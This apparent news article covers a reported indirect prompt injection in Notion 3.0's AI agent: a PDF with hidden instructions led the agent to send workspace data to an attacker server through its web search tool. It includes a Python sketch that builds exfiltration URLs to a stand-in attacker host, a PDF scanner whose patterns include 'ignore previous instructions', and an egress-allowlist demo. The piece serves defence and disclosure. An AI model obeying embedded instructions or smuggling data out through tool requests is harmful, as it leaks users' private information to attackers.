With the release of Notion 3.0, its autonomous AI agent feature has garnered significant attention for its ability to automate tasks like document drafting and database updates. However, a recent report from cybersecurity firm CodeIntegrity reveals a serious vulnerability in this feature: attackers can use a malicious PDF file to trick the AI agent into bypassing its safeguards and exfiltrating data. The discovery has sparked widespread concern about the security of AI systems.
CodeIntegrity attributes the vulnerability to the AI agent's "lethal trifecta": the combination of a large language model (LLM), tool access, and long-term memory. The researchers note that traditional role-based access control (RBAC) offers insufficient protection in such a setting. The core weakness lies in Notion 3.0's built-in "functions.search" web search tool. Originally designed to let the agent retrieve external information, it can be repurposed as an exfiltration channel, because data can be smuggled out inside the URLs the tool is instructed to fetch.
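To make that mechanism concrete, the short Python sketch below illustrates why an unrestricted web-fetch tool doubles as an exfiltration channel: whatever workspace text the agent is tricked into "searching for" leaves the system inside the request URL. The host and parameter name are invented for illustration; this is not code from the CodeIntegrity report.

```python
from urllib.parse import urlencode

# Hypothetical sketch: attacker.example and the 'q' parameter are invented.
# It only shows how ordinary URL encoding lets workspace text ride along
# in a GET request once an agent can fetch arbitrary URLs.
ATTACKER_HOST = "https://attacker.example/collect"  # placeholder domain

def smuggled_request_url(workspace_text: str) -> str:
    """Embed workspace text in an ordinary-looking web request."""
    return f"{ATTACKER_HOST}?{urlencode({'q': workspace_text})}"

if __name__ == "__main__":
    # The "search query" the injected instructions ask for is really the payload.
    print(smuggled_request_url("Q3 revenue forecast: ..."))
```

From the agent's perspective this is just another search or fetch, which is exactly why tool access turns a prompt injection into a data leak.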
To demonstrate the vulnerability's severity, the CodeIntegrity team staged a proof-of-concept attack: they created a PDF file containing hidden malicious instructions. When a user uploaded it to Notion and asked the AI to "summarize the report," the agent followed the embedded instructions instead, sending sensitive data to an attacker-controlled server. Strikingly, the attack succeeded even with Claude Sonnet 4 as the underlying model, highlighting a fundamental gap in existing protections: model-level safeguards alone do not reliably stop indirect prompt injection.
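One screening step workspace owners can apply on their own side is to inspect uploaded documents before an agent ever sees them. The sketch below is an assumption, not a mitigation described by CodeIntegrity: it uses the pypdf library to extract every text layer from a PDF (text extraction does not care whether a human could actually see the text) and flags instruction-like phrases. The pattern list is illustrative and easy to evade, so this is a screening aid rather than a guarantee.

```python
import re
from pypdf import PdfReader  # pip install pypdf

# Illustrative heuristics only; real injections can be paraphrased around them.
SUSPICIOUS_PATTERNS = [
    r"ignore (all )?(previous|prior) instructions",
    r"do not (tell|inform) the user",
    r"https?://\S+",   # embedded URLs the agent might be told to fetch
    r"system prompt",
]

def flag_hidden_instructions(pdf_path: str) -> list[str]:
    """Extract all text from the PDF and return lines that look like injected instructions."""
    reader = PdfReader(pdf_path)
    text = "\n".join(page.extract_text() or "" for page in reader.pages)
    hits = []
    for line in text.splitlines():
        if any(re.search(p, line, re.IGNORECASE) for p in SUSPICIOUS_PATTERNS):
            hits.append(line.strip())
    return hits

if __name__ == "__main__":
    # "uploaded_report.pdf" is a placeholder path for a file a user is about to share.
    for hit in flag_hidden_instructions("uploaded_report.pdf"):
        print("possible injected instruction:", hit)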
More worrying still, the vulnerability is not limited to PDF files. Because Notion 3.0 AI agents can connect to third-party services such as GitHub, Gmail, and Jira, any of these integrations could serve as a vector for indirect prompt injection: malicious instructions can reach the agent through many channels and trick it into acting against the user's intent. The finding is a wake-up call for the AI security community and a prompt for developers to reevaluate the security architecture of AI agents.
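One defense-in-depth measure commonly discussed for this class of attack is constraining where agent tools may send data. The sketch below assumes a generic fetch tool and an invented allowlist; it is not a Notion API and not a remedy proposed in the report, only an illustration of an egress allowlist that would block the kind of outbound request the demonstration relied on.

```python
from urllib.parse import urlparse

# Hypothetical defense-in-depth control: wrap whatever web-fetch or search tool
# the agent exposes so outbound requests can only reach allowlisted hosts.
ALLOWED_HOSTS = {"api.github.com", "www.googleapis.com"}  # example allowlist

class EgressDenied(Exception):
    pass

def guarded_fetch(url: str, fetch):
    """Call the underlying fetch tool only if the destination host is allowlisted."""
    host = urlparse(url).hostname or ""
    if host not in ALLOWED_HOSTS:
        raise EgressDenied(f"blocked outbound request to untrusted host: {host}")
    return fetch(url)

if __name__ == "__main__":
    fake_fetch = lambda url: f"fetched {url}"  # stand-in for the real tool
    print(guarded_fetch("https://api.github.com/repos", fake_fetch))
    try:
        guarded_fetch("https://attacker.example/collect?q=secrets", fake_fetch)
    except EgressDenied as err:
        print(err)
```

An allowlist does not remove the underlying prompt-injection risk, but it narrows the exfiltration paths an injected instruction can exploit.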